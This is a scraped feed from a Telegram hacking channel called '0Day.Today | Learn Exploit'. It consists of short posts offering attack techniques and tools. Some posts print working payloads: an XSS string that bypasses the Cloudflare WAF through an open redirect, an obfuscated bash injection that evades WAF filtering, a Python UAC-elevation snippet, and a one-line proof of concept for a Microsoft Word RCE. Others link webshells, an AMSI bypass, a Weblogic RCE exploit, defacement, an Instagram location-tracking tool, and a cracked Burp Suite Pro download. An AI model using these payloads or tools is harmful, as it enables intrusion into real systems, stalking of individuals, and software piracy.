0Day.Today | Learn Exploit | Zero World | Dark web

0Day.Today | Learn Exploit | Zero World | Dark web |

[ Bypass Cloudflare ] Open Redirect to XSS

Open Redirect :

/login?redirectUrl=//evil,org --> redirect to evil,org

Escalate to XSS :

/login?redirectUrl=javascript:alert(1) --> blocked by WAF

Final payload to bypass the WAF :

/login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain --> xss pop-up

#bypass #cloudflare #xss
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.4K views06:50

0Day.Today | Learn Exploit | Zero World | Dark web |

Payload Injector:

➕

Debinject:

😸

GitHub

➕

Pixload:

😸

GitHub

➕

Gospider:

😸

GitHub

#Injection #Hacking_Tool #BugBounty

BugCod3

➗

🔥

0Day.Today

👤

T.me/LearnExploit

📢

T.me/Tech_Army

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

2.2K views09:12

0Day.Today | Learn Exploit | Zero World | Dark web |

Bypass 403 (Forbidden) Methodology

6 usefull Trick for bypass the Forbidden admin page...

...::: X P 4 :::...
➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army

2.6K views16:12

0Day.Today | Learn Exploit | Zero World | Dark web |

cyber security courses

Download

#Download
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.6K viewsedited 09:59

0Day.Today | Learn Exploit | Zero World | Dark web |

Trackgram

Use Instagram location features to track an account

Github

#tools #instagram
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.6K views14:41

0Day.Today | Learn Exploit | Zero World | Dark web |

ALL IN ONE INFORMATION GATHERING TOOLS

OSINT.SH

#Osint #tools
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.9K views20:46

0Day.Today | Learn Exploit | Zero World | Dark web |

Various webshells

Github

#shell #collection
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.8K views12:57

0Day.Today | Learn Exploit | Zero World | Dark web |

Lifetime AMSI bypass

Github

#Win32 #bypass
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.8K views10:59

0Day.Today | Learn Exploit | Zero World | Dark web |

Weblogic CVE-2023-21839 RCE

Github

#CVE #RCE
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.8K viewsedited 20:54

0Day.Today | Learn Exploit | Zero World | Dark web |

bash injection bypass waf

$0<<<$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'

#bypass #Waf
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.8K views06:54

0Day.Today | Learn Exploit | Zero World | Dark web |

👁 Site
🌐 Zone-h

#Deface

BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥

0Day.Today

👤 T.me/LearnExploit
📢 T.me/Tech_Army

2.4K viewsedited 14:55

0Day.Today | Learn Exploit | Zero World | Dark web |

This code will bypass the UAC prompt, running a command as an Administrator.

`command = "insert command here"
process = subprocess.Popen(['powershell.exe', 'Start-Process', command, '-Verb', 'runAs'], stdout=subprocess.PIPE)
process.communicate()[0]`

#UAC #Bypass
——————⁧
0Day.Today
@LearnExploit
@Tech_Army

2.4K views12:49

0Day.Today | Learn Exploit | Zero World | Dark web |

burpsuite_pro_v2023.2.2.zip

563.7 MB

Burp Suite Version 2023.2.2

آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java runtime ورژن 9 به بالا و Java JDK نیاز خواهید داشت . *

Pass : 311138

#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army

2.3K views09:05

0Day.Today | Learn Exploit | Zero World | Dark web |

CVE-2023-21716(Microsoft Word RCE vuln) Python PoC

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))

#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army

2.2K views09:06

0Day.Today | Learn Exploit | Zero World | Dark web |